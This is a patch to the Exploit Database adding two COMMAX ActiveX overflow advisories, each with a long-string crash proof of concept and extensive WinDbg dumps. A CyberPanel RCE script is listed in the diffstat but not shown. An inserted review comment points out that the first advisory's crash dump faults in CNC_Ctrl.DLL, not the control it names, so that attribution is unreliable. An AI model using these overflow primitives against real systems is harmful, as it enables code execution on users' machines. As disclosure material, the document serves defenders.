From ac4322c402cdd33966a45ed97667c4b537cabe6c Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Sat, 28 Aug 2021 05:01:59 +0000
Subject: [PATCH] DB: 2021-08-28
3 changes to exploits/shellcodes
CyberPanel 2.1 - Remote Code Execution (RCE) (Authenticated)
COMMAX WebViewer ActiveX Control 2.1.4.5 - 'Commax_WebViewer.ocx' Buffer Overflow
COMMAX UMS Client ActiveX Control 1.7.0.2 - 'CNC_Ctrl.dll' Heap Buffer Overflow
---
 exploits/hardware/webapps/50231.txt | 332 +++++++++++++++++
 exploits/hardware/webapps/50232.txt | 551 ++++++++++++++++++++++++++++
 exploits/multiple/webapps/50230.py | 203 ++++++++++
 files_exploits.csv | 3 +
 4 files changed, 1089 insertions(+)
 create mode 100644 exploits/hardware/webapps/50231.txt
 create mode 100644 exploits/hardware/webapps/50232.txt
 create mode 100755 exploits/multiple/webapps/50230.py
diff --git a/exploits/hardware/webapps/50231.txt b/exploits/hardware/webapps/50231.txt
new file mode 100644
index 000000000..90e50c4c7
--- /dev/null
+++ b/exploits/hardware/webapps/50231.txt
@@ -0,0 +1,332 @@ +# Exploit Title: COMMAX WebViewer ActiveX Control 2.1.4.5 - 'Commax_WebViewer.ocx' Buffer Overflow +# Date: 02.08.2021 +# Exploit Author: LiquidWorm +# Vendor Homepage: https://www.commax.com + +COMMAX WebViewer ActiveX Control 2.1.4.5 (Commax_WebViewer.ocx) Buffer Overflow + + +Vendor: COMMAX Co., Ltd. +Prodcut web page: https://www.commax.com +Affected version: 2.1.4.5 + +Summary: COMMAX activex web viewer client (32bit) for COMMAX DVR/NVR. + +Desc: The vulnerability is caused due to a boundary error in the +processing of user input, which can be exploited to cause a buffer +overflow when a user inserts overly long array of string bytes +through several functions. Successful exploitation could allow +execution of arbitrary code on the affected node. + +Tested on: Microsoft Windows 10 Home (64bit) EN + Microsoft Internet Explorer 20H2 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2021-5663 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5663.php + + +02.08.2021 + +-- + + +$ python +>>> "A"*1000 [ToTheClipboard] +>>>#Paste in ID or anywhere + +(5220.5b30): Access violation - code c0000005 (!!! second chance !!!) +wow64!Wow64pNotifyDebugger+0x19918: +00007ff9`deb0b530 c644242001 mov byte ptr [rsp+20h],1 ss:00000000`0c47de00=00 +0:038> g +(5220.5b30): Access violation - code c0000005 (first chance) +First chance exceptions are reported before any exception handling. +This exception may be expected and handled. +*** ERROR: Symbol file could not be found. 
Defaulted to export symbols for CNC_Ctrl.DLL - +CNC_Ctrl!DllUnregisterServer+0xf5501: +0b4d43bf f3aa rep stos byte ptr es:[edi] +0:038:x86> r +eax=00000000 ebx=00002000 ecx=0000000f edx=00000000 esi=41414141 edi=41414141 +eip=0b4d43bf esp=0d78f920 ebp=0d78f930 iopl=0 nv up ei pl zr na pe nc +cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246 +CNC_Ctrl!DllUnregisterServer+0xf5501: +0b4d43bf f3aa rep stos byte ptr es:[edi] +0:038:x86> !exchain +0d78fac4: CNC_Ctrl!DllUnregisterServer+eca92 (0b4cb950) +0d78fb74: ntdll_76f80000!_except_handler4+0 (76ffad20) + CRT scope 0, filter: ntdll_76f80000!__RtlUserThreadStart+3cdb7 (77024806) + func: ntdll_76f80000!__RtlUserThreadStart+3ce50 (7702489f) +0d78fb8c: ntdll_76f80000!FinalExceptionHandlerPad25+0 (77008a29) +Invalid exception stack at ffffffff +0:038:x86> kb + # ChildEBP RetAddr Args to Child +WARNING: Stack unwind information not available. Following frames may be wrong. +00 0d78f930 0b405dea 41414141 00000000 00002000 CNC_Ctrl!DllUnregisterServer+0xf5501 +01 0d78f950 0b40ab25 0d78faec 00000020 61b76900 CNC_Ctrl!DllUnregisterServer+0x26f2c +02 0d78f978 76fc2857 099c3a70 00000000 02f50000 CNC_Ctrl!DllUnregisterServer+0x2bc67 +03 0d78fa08 00000000 00000000 00000000 00000000 ntdll_76f80000!RtlpReAllocateHeapInternal+0xf7 +0:038:x86> d esp +0d78f920 0f 00 00 00 00 00 00 00-dc 2e ff 76 78 c5 7e 0b ...........vx.~. +0d78f930 b0 c9 7e 0b ea 5d 40 0b-41 41 41 41 00 00 00 00 ..~..]@.AAAA.... +0d78f940 00 20 00 00 04 00 00 00-78 c5 7e 0b 00 00 00 00 . ......x.~..... +0d78f950 10 5e 0b 75 25 ab 40 0b-ec fa 78 0d 20 00 00 00 .^.u%.@...x. ... +0d78f960 00 69 b7 61 d4 fa 78 0d-00 00 00 00 b8 0d 00 00 .i.a..x......... +0d78f970 10 00 00 00 fe ff ff ff-08 fa 78 0d 57 28 fc 76 ..........x.W(.v +0d78f980 70 3a 9c 09 00 00 00 00-00 00 f5 02 8a 28 fc 76 p:...........(.v +0d78f990 00 00 00 00 00 00 00 00-e0 01 00 00 74 0e 00 00 ............t... 
+0:038:x86> d ebp +0d78f930 b0 c9 7e 0b ea 5d 40 0b-41 41 41 41 00 00 00 00 ..~..]@.AAAA.... +0d78f940 00 20 00 00 04 00 00 00-78 c5 7e 0b 00 00 00 00 . ......x.~..... +0d78f950 10 5e 0b 75 25 ab 40 0b-ec fa 78 0d 20 00 00 00 .^.u%.@...x. ... +0d78f960 00 69 b7 61 d4 fa 78 0d-00 00 00 00 b8 0d 00 00 .i.a..x......... +0d78f970 10 00 00 00 fe ff ff ff-08 fa 78 0d 57 28 fc 76 ..........x.W(.v +0d78f980 70 3a 9c 09 00 00 00 00-00 00 f5 02 8a 28 fc 76 p:...........(.v +0d78f990 00 00 00 00 00 00 00 00-e0 01 00 00 74 0e 00 00 ............t... +0d78f9a0 8c 0c 00 00 88 0e 00 00-8c 0e 00 00 b8 0d 00 00 ................ +0:038:x86> d esi +41414141 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ???????????????? +41414151 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ???????????????? +41414161 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ???????????????? +41414171 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ???????????????? +41414181 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ???????????????? +41414191 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ???????????????? +414141a1 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ???????????????? +414141b1 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ???????????????? +0:038:x86> !analyze -v +******************************************************************************* +* * +* Exception Analysis * +* * +******************************************************************************* + +*** ERROR: Symbol file could not be found. Defaulted to export symbols for ie_to_edge_bho.dll - +*** ERROR: Symbol file could not be found. Defaulted to export symbols for Commax_WebViewer.OCX - +GetUrlPageData2 (WinHttp) failed: 12002. 
+ +DUMP_CLASS: 2 + +DUMP_QUALIFIER: 0 + +FAULTING_IP: +CNC_Ctrl!DllUnregisterServer+f5501 +0b4d43bf f3aa rep stos byte ptr es:[edi] + +EXCEPTION_RECORD: (.exr -1) +ExceptionAddress: 0b4d43bf (CNC_Ctrl!DllUnregisterServer+0x000f5501) + ExceptionCode: c0000005 (Access violation) + ExceptionFlags: 00000000 +NumberParameters: 2 + Parameter[0]: 00000001 + Parameter[1]: 41414141 +Attempt to write to address 41414141 + +FAULTING_THREAD: 00005b30 + +DEFAULT_BUCKET_ID: INVALID_POINTER_WRITE + +PROCESS_NAME: IEXPLORE.EXE + +ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s. + +EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s. + +EXCEPTION_CODE_STR: c0000005 + +EXCEPTION_PARAMETER1: 00000001 + +EXCEPTION_PARAMETER2: 41414141 + +FOLLOWUP_IP: +CNC_Ctrl!DllUnregisterServer+f5501 +0b4d43bf f3aa rep stos byte ptr es:[edi] + +WRITE_ADDRESS: 41414141 + +WATSON_BKT_PROCSTAMP: 95286d96 + +WATSON_BKT_PROCVER: 11.0.19041.1 + +PROCESS_VER_PRODUCT: Internet Explorer + +WATSON_BKT_MODULE: CNC_Ctrl.DLL + +WATSON_BKT_MODSTAMP: 547ed821 + +WATSON_BKT_MODOFFSET: 1043bf + +WATSON_BKT_MODVER: 1.7.0.2 + +MODULE_VER_PRODUCT: CNC_Ctrl Module + +BUILD_VERSION_STRING: 10.0.19041.1023 (WinBuild.160101.0800) + +MODLIST_WITH_TSCHKSUM_HASH: aadfa1c5bdd8f77b979f6a5b222994db450b715e + +MODLIST_SHA1_HASH: 849cfdbdcb18d5749dc41f313fc544a643772db9 + +NTGLOBALFLAG: 0 + +PROCESS_BAM_CURRENT_THROTTLED: 0 + +PROCESS_BAM_PREVIOUS_THROTTLED: 0 + +APPLICATION_VERIFIER_FLAGS: 0 + +PRODUCT_TYPE: 1 + +SUITE_MASK: 784 + +DUMP_TYPE: fe + +ANALYSIS_SESSION_HOST: LAB17 + +ANALYSIS_SESSION_TIME: 08-12-2021 14:20:11.0116 + +ANALYSIS_VERSION: 10.0.16299.91 amd64fre + +THREAD_ATTRIBUTES: +OS_LOCALE: ENU + +PROBLEM_CLASSES: + + ID: [0n301] + Type: [@ACCESS_VIOLATION] + Class: Addendum + Scope: BUCKET_ID + Name: Omit + Data: Omit + PID: [Unspecified] + TID: [0x5b30] + Frame: [0] : 
CNC_Ctrl!DllUnregisterServer + + ID: [0n274] + Type: [INVALID_POINTER_WRITE] + Class: Primary + Scope: DEFAULT_BUCKET_ID (Failure Bucket ID prefix) + BUCKET_ID + Name: Add + Data: Omit + PID: [Unspecified] + TID: [0x5b30] + Frame: [0] : CNC_Ctrl!DllUnregisterServer + + ID: [0n152] + Type: [ZEROED_STACK] + Class: Addendum + Scope: BUCKET_ID + Name: Add + Data: Omit + PID: [0x5220] + TID: [0x5b30] + Frame: [0] : CNC_Ctrl!DllUnregisterServer + +BUGCHECK_STR: APPLICATION_FAULT_INVALID_POINTER_WRITE_ZEROED_STACK + +PRIMARY_PROBLEM_CLASS: APPLICATION_FAULT + +LAST_CONTROL_TRANSFER: from 0b405dea to 0b4d43bf + +STACK_TEXT: +WARNING: Stack unwind information not available. Following frames may be wrong. +0d78f930 0b405dea 41414141 00000000 00002000 CNC_Ctrl!DllUnregisterServer+0xf5501 +0d78f950 0b40ab25 0d78faec 00000020 61b76900 CNC_Ctrl!DllUnregisterServer+0x26f2c +0d78f978 76fc2857 099c3a70 00000000 02f50000 CNC_Ctrl!DllUnregisterServer+0x2bc67 +0d78fa08 00000000 00000000 00000000 00000000 ntdll_76f80000!RtlpReAllocateHeapInternal+0xf7 + + +THREAD_SHA1_HASH_MOD_FUNC: e84e62df4095d241971250198ae18de0797cfdc7 + +THREAD_SHA1_HASH_MOD_FUNC_OFFSET: 2033316a7c1a92aaeab1ce97e013350953fef546 + +THREAD_SHA1_HASH_MOD: 6d850af928076b326edbcafdf6dd4f771aafbab5 + +FAULT_INSTR_CODE: 458baaf3 + +SYMBOL_STACK_INDEX: 0 + +SYMBOL_NAME: CNC_Ctrl!DllUnregisterServer+f5501 + +FOLLOWUP_NAME: MachineOwner + +MODULE_NAME: CNC_Ctrl + +IMAGE_NAME: CNC_Ctrl.DLL + +DEBUG_FLR_IMAGE_TIMESTAMP: 547ed821 + +STACK_COMMAND: ~38s ; .cxr ; kb + +FAILURE_BUCKET_ID: INVALID_POINTER_WRITE_c0000005_CNC_Ctrl.DLL!DllUnregisterServer + +BUCKET_ID: APPLICATION_FAULT_INVALID_POINTER_WRITE_ZEROED_STACK_CNC_Ctrl!DllUnregisterServer+f5501 + +FAILURE_EXCEPTION_CODE: c0000005 + +FAILURE_IMAGE_NAME: CNC_Ctrl.DLL + +BUCKET_ID_IMAGE_STR: CNC_Ctrl.DLL + +FAILURE_MODULE_NAME: CNC_Ctrl + +BUCKET_ID_MODULE_STR: CNC_Ctrl + +FAILURE_FUNCTION_NAME: DllUnregisterServer + +BUCKET_ID_FUNCTION_STR: DllUnregisterServer + 
+BUCKET_ID_OFFSET: f5501 + +BUCKET_ID_MODTIMEDATESTAMP: 547ed821 + +BUCKET_ID_MODCHECKSUM: 357a4b + +BUCKET_ID_MODVER_STR: 1.7.0.2 + +BUCKET_ID_PREFIX_STR: APPLICATION_FAULT_INVALID_POINTER_WRITE_ZEROED_STACK_ + +FAILURE_PROBLEM_CLASS: APPLICATION_FAULT + +FAILURE_SYMBOL_NAME: CNC_Ctrl.DLL!DllUnregisterServer + +WATSON_STAGEONE_URL: http://watson.microsoft.com/StageOne/IEXPLORE.EXE/11.0.19041.1/95286d96/CNC_Ctrl.DLL/1.7.0.2/547ed821/c0000005/001043bf.htm?Retriage=1 + +TARGET_TIME: 2021-08-12T12:21:50.000Z + +OSBUILD: 19042 + +OSSERVICEPACK: 1023 + +SERVICEPACK_NUMBER: 0 + +OS_REVISION: 0 + +OSPLATFORM_TYPE: x64 + +OSNAME: Windows 10 + +OSEDITION: Windows 10 WinNt SingleUserTS Personal + +USER_LCID: 0 + +OSBUILD_TIMESTAMP: unknown_date + +BUILDDATESTAMP_STR: 160101.0800 + +BUILDLAB_STR: WinBuild + +BUILDOSVER_STR: 10.0.19041.1023 + +ANALYSIS_SESSION_ELAPSED_TIME: 1d869 + +ANALYSIS_SOURCE: UM + +FAILURE_ID_HASH_STRING: um:invalid_pointer_write_c0000005_cnc_ctrl.dll!dllunregisterserver + +FAILURE_ID_HASH: {5e1e375a-c411-e928-cd64-b7f6c07eea3b} + +Followup: MachineOwner +--------- \ No newline at end of file diff --git a/exploits/hardware/webapps/50232.txt b/exploits/hardware/webapps/50232.txt new file mode 100644 index 000000000..de6ee4b5a --- /dev/null +++ b/exploits/hardware/webapps/50232.txt 
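Review bot: The debugger output attached to this advisory implicates CNC_Ctrl.DLL, not the Commax_WebViewer.ocx 2.1.4.5 control named in the title, Affected version and Summary: `WATSON_BKT_MODULE: CNC_Ctrl.DLL`, `WATSON_BKT_MODVER: 1.7.0.2`, and every CNC_Ctrl frame in STACK_TEXT point at the same module the sibling entry 50232.txt covers, while Commax_WebViewer.OCX appears only in a symbol-load error line. This looks like either a pasted-in crash log from the other control or a misattributed affected component, and a reader deciding which control to patch, disable or kill-bit cannot resolve it from this file alone. The header should name the module the dump actually faults in, or the dump should be replaced with one taken against Commax_WebViewer.ocx. Minor wording: `Prodcut web page` should read `Product web page` (the same typo is in 50232.txt).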
@@ -0,0 +1,551 @@ +# Exploit Title: COMMAX UMS Client ActiveX Control 1.7.0.2 - 'CNC_Ctrl.dll' Heap Buffer Overflow +# Date: 02.08.2021 +# Exploit Author: LiquidWorm +# Vendor Homepage: https://www.commax.com + +COMMAX UMS Client ActiveX Control 1.7.0.2 (CNC_Ctrl.dll) Heap Buffer Overflow + + +Vendor: COMMAX Co., Ltd. +Prodcut web page: https://www.commax.com +Affected version: 1.7.0.2 + +Summary: COMMAX activex web viewer UMS client (32bit) for COMMAX +DVR/NVR. + +Desc: The vulnerability is caused due to a boundary error in the +processing of user input, which can be exploited to cause a heap +based buffer overflow when a user inserts overly long array of +string bytes through several functions. Successful exploitation +could allow execution of arbitrary code on the affected node. + +Tested on: Microsoft Windows 10 Home (64bit) EN + Microsoft Internet Explorer 20H2 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2021-5664 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5664.php + + +02.08.2021 + +-- + + + + + + + + + +== + +(5b1c.59e8): Access violation - code c0000005 (first chance) +First chance exceptions are reported before any exception handling. +This exception may be expected and handled. +*** ERROR: Symbol file could not be found. Defaulted to export symbols for CNC_Ctrl.DLL - +CNC_Ctrl!DllUnregisterServer+0x19e34: +10028cf2 83a1d412000000 and dword ptr [ecx+12D4h],0 ds:002b:000012d4=???????? +0:000:x86> r +eax=00000001 ebx=10119db8 ecx=00000000 edx=81ff6f2e esi=058c0048 edi=00000001 +eip=10028cf2 esp=030fcf10 ebp=030fe33c iopl=0 nv up ei pl nz na pe nc +cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206 +CNC_Ctrl!DllUnregisterServer+0x19e34: +10028cf2 83a1d412000000 and dword ptr [ecx+12D4h],0 ds:002b:000012d4=???????? 
+0:000:x86> !exchain +030feab4: 41414141 +Invalid exception stack at 41414141 +0:000:x86> d esp +030fcf10 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA +030fcf20 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA +030fcf30 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA +030fcf40 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA +030fcf50 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA +030fcf60 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA +030fcf70 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA +030fcf80 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA +0:000:x86> d ebp +030fe33c 61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61 aaaaaaaaaaaaaaaa +030fe34c 61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61 aaaaaaaaaaaaaaaa +030fe35c 61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61 aaaaaaaaaaaaaaaa +030fe36c 61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61 aaaaaaaaaaaaaaaa +030fe37c 61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61 aaaaaaaaaaaaaaaa +030fe38c 61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61 aaaaaaaaaaaaaaaa +030fe39c 61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61 aaaaaaaaaaaaaaaa +030fe3ac 61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61 aaaaaaaaaaaaaaaa +0:000:x86> !analyze -v +******************************************************************************* +* * +* Exception Analysis * +* * +******************************************************************************* + +GetUrlPageData2 (WinHttp) failed: 12002. 
+ +DUMP_CLASS: 2 + +DUMP_QUALIFIER: 0 + +FAULTING_IP: +CNC_Ctrl!DllUnregisterServer+18ee3 +10027da1 8999d4120000 mov dword ptr [ecx+12D4h],ebx + +EXCEPTION_RECORD: (.exr -1) +ExceptionAddress: 10027da1 (CNC_Ctrl!DllUnregisterServer+0x00018ee3) + ExceptionCode: c0000005 (Access violation) + ExceptionFlags: 00000000 +NumberParameters: 2 + Parameter[0]: 00000001 + Parameter[1]: 000012d4 +Attempt to write to address 000012d4 + +FAULTING_THREAD: 000056a4 + +DEFAULT_BUCKET_ID: INVALID_POINTER_WRITE + +PROCESS_NAME: wscript.exe + +ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s. + +EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s. + +EXCEPTION_CODE_STR: c0000005 + +EXCEPTION_PARAMETER1: 00000001 + +EXCEPTION_PARAMETER2: 000012d4 + +FOLLOWUP_IP: +CNC_Ctrl!DllUnregisterServer+18ee3 +10027da1 8999d4120000 mov dword ptr [ecx+12D4h],ebx + +WRITE_ADDRESS: 000012d4 + +WATSON_BKT_PROCSTAMP: 7159f3df + +WATSON_BKT_PROCVER: 5.812.10240.16384 + +PROCESS_VER_PRODUCT: Microsoft ® Windows Script Host + +WATSON_BKT_MODULE: CNC_Ctrl.DLL + +WATSON_BKT_MODSTAMP: 547ed821 + +WATSON_BKT_MODOFFSET: 27da1 + +WATSON_BKT_MODVER: 1.7.0.2 + +MODULE_VER_PRODUCT: CNC_Ctrl Module + +BUILD_VERSION_STRING: 10.0.19041.1023 (WinBuild.160101.0800) + +MODLIST_WITH_TSCHKSUM_HASH: d459299c6b0ff5b482d41c6445b84a3447c0171e + +MODLIST_SHA1_HASH: 18e8e8c8cdd4f9db5369e6ca934fd1b74bcb19c1 + +NTGLOBALFLAG: 0 + +PROCESS_BAM_CURRENT_THROTTLED: 0 + +PROCESS_BAM_PREVIOUS_THROTTLED: 0 + +APPLICATION_VERIFIER_FLAGS: 0 + +PRODUCT_TYPE: 1 + +SUITE_MASK: 784 + +DUMP_TYPE: fe + +ANALYSIS_SESSION_HOST: LAB17 + +ANALYSIS_SESSION_TIME: 08-12-2021 13:37:16.0907 + +ANALYSIS_VERSION: 10.0.16299.91 amd64fre + +THREAD_ATTRIBUTES: +OS_LOCALE: ENU + +PROBLEM_CLASSES: + + ID: [0n301] + Type: [@ACCESS_VIOLATION] + Class: Addendum + Scope: BUCKET_ID + Name: Omit + Data: Omit + PID: [Unspecified] + TID: 
[0x56a4] + Frame: [0] : CNC_Ctrl!DllUnregisterServer + + ID: [0n274] + Type: [INVALID_POINTER_WRITE] + Class: Primary + Scope: DEFAULT_BUCKET_ID (Failure Bucket ID prefix) + BUCKET_ID + Name: Add + Data: Omit + PID: [Unspecified] + TID: [0x56a4] + Frame: [0] : CNC_Ctrl!DllUnregisterServer + + ID: [0n152] + Type: [ZEROED_STACK] + Class: Addendum + Scope: BUCKET_ID + Name: Add + Data: Omit + PID: [0x56e4] + TID: [0x56a4] + Frame: [0] : CNC_Ctrl!DllUnregisterServer + +BUGCHECK_STR: APPLICATION_FAULT_INVALID_POINTER_WRITE_ZEROED_STACK + +PRIMARY_PROBLEM_CLASS: APPLICATION_FAULT + +IP_ON_HEAP: 61616161 +The fault address in not in any loaded module, please check your build's rebase +log at \bin\build_logs\timebuild\ntrebase.log for module which may +contain the address if it were loaded. + +IP_IN_FREE_BLOCK: 61616161 + +FRAME_ONE_INVALID: 1 + +LAST_CONTROL_TRANSFER: from 61616161 to 10027da1 + +STACK_TEXT: +WARNING: Stack unwind information not available. Following frames may be wrong. +00afe294 61616161 61616161 61616161 61616161 CNC_Ctrl!DllUnregisterServer+0x18ee3 +00afe298 61616161 61616161 61616161 61616161 0x61616161 +00afe29c 61616161 61616161 61616161 61616161 0x61616161 +00afe2a0 61616161 61616161 61616161 61616161 0x61616161 +00afe2a4 61616161 61616161 61616161 61616161 0x61616161 +00afe2a8 61616161 61616161 61616161 61616161 0x61616161 +00afe2ac 61616161 61616161 61616161 61616161 0x61616161 +00afe2b0 61616161 61616161 61616161 61616161 0x61616161 +00afe2b4 61616161 61616161 61616161 61616161 0x61616161 +00afe2b8 61616161 61616161 61616161 61616161 0x61616161 +00afe2bc 61616161 61616161 61616161 61616161 0x61616161 +00afe2c0 61616161 61616161 61616161 61616161 0x61616161 +00afe2c4 61616161 61616161 61616161 61616161 0x61616161 +00afe2c8 61616161 61616161 61616161 61616161 0x61616161 +00afe2cc 61616161 61616161 61616161 61616161 0x61616161 +00afe2d0 61616161 61616161 61616161 61616161 0x61616161 +00afe2d4 61616161 61616161 61616161 61616161 0x61616161 
+00afe2d8 61616161 61616161 61616161 61616161 0x61616161 +00afe2dc 61616161 61616161 61616161 61616161 0x61616161 +00afe2e0 61616161 61616161 61616161 61616161 0x61616161 +00afe2e4 61616161 61616161 61616161 61616161 0x61616161 +00afe2e8 61616161 61616161 61616161 61616161 0x61616161 +00afe2ec 61616161 61616161 61616161 61616161 0x61616161 +00afe2f0 61616161 61616161 61616161 61616161 0x61616161 +00afe2f4 61616161 61616161 61616161 61616161 0x61616161 +00afe2f8 61616161 61616161 61616161 61616161 0x61616161 +00afe2fc 61616161 61616161 61616161 61616161 0x61616161 +00afe300 61616161 61616161 61616161 61616161 0x61616161 +00afe304 61616161 61616161 61616161 61616161 0x61616161 +00afe308 61616161 61616161 61616161 61616161 0x61616161 +00afe30c 61616161 61616161 61616161 61616161 0x61616161 +00afe310 61616161 61616161 61616161 61616161 0x61616161 +00afe314 61616161 61616161 61616161 61616161 0x61616161 +00afe318 61616161 61616161 61616161 41414141 0x61616161 +00afe31c 61616161 61616161 41414141 41414141 0x61616161 +00afe320 61616161 41414141 41414141 41414141 0x61616161 +00afe324 41414141 41414141 41414141 41414141 0x61616161 +00afe328 41414141 41414141 41414141 41414141 0x41414141 +00afe32c 41414141 41414141 41414141 41414141 0x41414141 +00afe330 41414141 41414141 41414141 41414141 0x41414141 +00afe334 41414141 41414141 41414141 41414141 0x41414141 +00afe338 41414141 41414141 41414141 41414141 0x41414141 +00afe33c 41414141 41414141 41414141 41414141 0x41414141 +00afe340 41414141 41414141 41414141 41414141 0x41414141 +00afe344 41414141 41414141 41414141 41414141 0x41414141 +00afe348 41414141 41414141 41414141 41414141 0x41414141 +00afe34c 41414141 41414141 41414141 41414141 0x41414141 +00afe350 41414141 41414141 41414141 41414141 0x41414141 +00afe354 41414141 41414141 41414141 41414141 0x41414141 +00afe358 41414141 41414141 41414141 41414141 0x41414141 +00afe35c 41414141 41414141 41414141 41414141 0x41414141 +00afe360 41414141 41414141 41414141 41414141 0x41414141 
+00afe364 41414141 41414141 41414141 41414141 0x41414141 +00afe368 41414141 41414141 41414141 41414141 0x41414141 +00afe36c 41414141 41414141 41414141 41414141 0x41414141 +00afe370 41414141 41414141 41414141 41414141 0x41414141 +00afe374 41414141 41414141 41414141 41414141 0x41414141 +00afe378 41414141 41414141 41414141 41414141 0x41414141 +00afe37c 41414141 41414141 41414141 41414141 0x41414141 +00afe380 41414141 41414141 41414141 41414141 0x41414141 +00afe384 41414141 41414141 41414141 41414141 0x41414141 +00afe388 41414141 41414141 41414141 41414141 0x41414141 +00afe38c 41414141 41414141 41414141 41414141 0x41414141 +00afe390 41414141 41414141 41414141 41414141 0x41414141 +00afe394 41414141 41414141 41414141 41414141 0x41414141 +00afe398 41414141 41414141 41414141 41414141 0x41414141 +00afe39c 41414141 41414141 41414141 41414141 0x41414141 +00afe3a0 41414141 41414141 41414141 41414141 0x41414141 +00afe3a4 41414141 41414141 41414141 41414141 0x41414141 +00afe3a8 41414141 41414141 41414141 41414141 0x41414141 +00afe3ac 41414141 41414141 41414141 41414141 0x41414141 +00afe3b0 41414141 41414141 41414141 41414141 0x41414141 +00afe3b4 41414141 41414141 41414141 41414141 0x41414141 +00afe3b8 41414141 41414141 41414141 41414141 0x41414141 +00afe3bc 41414141 41414141 41414141 41414141 0x41414141 +00afe3c0 41414141 41414141 41414141 41414141 0x41414141 +00afe3c4 41414141 41414141 41414141 41414141 0x41414141 +00afe3c8 41414141 41414141 41414141 41414141 0x41414141 +00afe3cc 41414141 41414141 41414141 41414141 0x41414141 +00afe3d0 41414141 41414141 41414141 41414141 0x41414141 +00afe3d4 41414141 41414141 41414141 41414141 0x41414141 +00afe3d8 41414141 41414141 41414141 41414141 0x41414141 +00afe3dc 41414141 41414141 41414141 41414141 0x41414141 +00afe3e0 41414141 41414141 41414141 41414141 0x41414141 +00afe3e4 41414141 41414141 41414141 41414141 0x41414141 +00afe3e8 41414141 41414141 41414141 41414141 0x41414141 +00afe3ec 41414141 41414141 41414141 41414141 0x41414141 
+00afe3f0 41414141 41414141 41414141 41414141 0x41414141 +00afe3f4 41414141 41414141 41414141 41414141 0x41414141 +00afe3f8 41414141 41414141 41414141 41414141 0x41414141 +00afe3fc 41414141 41414141 41414141 41414141 0x41414141 +00afe400 41414141 41414141 41414141 41414141 0x41414141 +00afe404 41414141 41414141 41414141 41414141 0x41414141 +00afe408 41414141 41414141 41414141 41414141 0x41414141 +00afe40c 41414141 41414141 41414141 41414141 0x41414141 +00afe410 41414141 41414141 41414141 41414141 0x41414141 +00afe414 41414141 41414141 41414141 41414141 0x41414141 +00afe418 41414141 41414141 41414141 41414141 0x41414141 +00afe41c 41414141 41414141 41414141 41414141 0x41414141 +00afe420 41414141 41414141 41414141 41414141 0x41414141 +00afe424 41414141 41414141 41414141 41414141 0x41414141 +00afe428 41414141 41414141 41414141 41414141 0x41414141 +00afe42c 41414141 41414141 41414141 41414141 0x41414141 +00afe430 41414141 41414141 41414141 41414141 0x41414141 +00afe434 41414141 41414141 41414141 41414141 0x41414141 +00afe438 41414141 41414141 41414141 41414141 0x41414141 +00afe43c 41414141 41414141 41414141 41414141 0x41414141 +00afe440 41414141 41414141 41414141 41414141 0x41414141 +00afe444 41414141 41414141 41414141 41414141 0x41414141 +00afe448 41414141 41414141 41414141 41414141 0x41414141 +00afe44c 41414141 41414141 41414141 41414141 0x41414141 +00afe450 41414141 41414141 41414141 41414141 0x41414141 +00afe454 41414141 41414141 41414141 41414141 0x41414141 +00afe458 41414141 41414141 41414141 41414141 0x41414141 +00afe45c 41414141 41414141 41414141 41414141 0x41414141 +00afe460 41414141 41414141 41414141 41414141 0x41414141 +00afe464 41414141 41414141 41414141 41414141 0x41414141 +00afe468 41414141 41414141 41414141 41414141 0x41414141 +00afe46c 41414141 41414141 41414141 41414141 0x41414141 +00afe470 41414141 41414141 41414141 41414141 0x41414141 +00afe474 41414141 41414141 41414141 41414141 0x41414141 +00afe478 41414141 41414141 41414141 41414141 0x41414141 
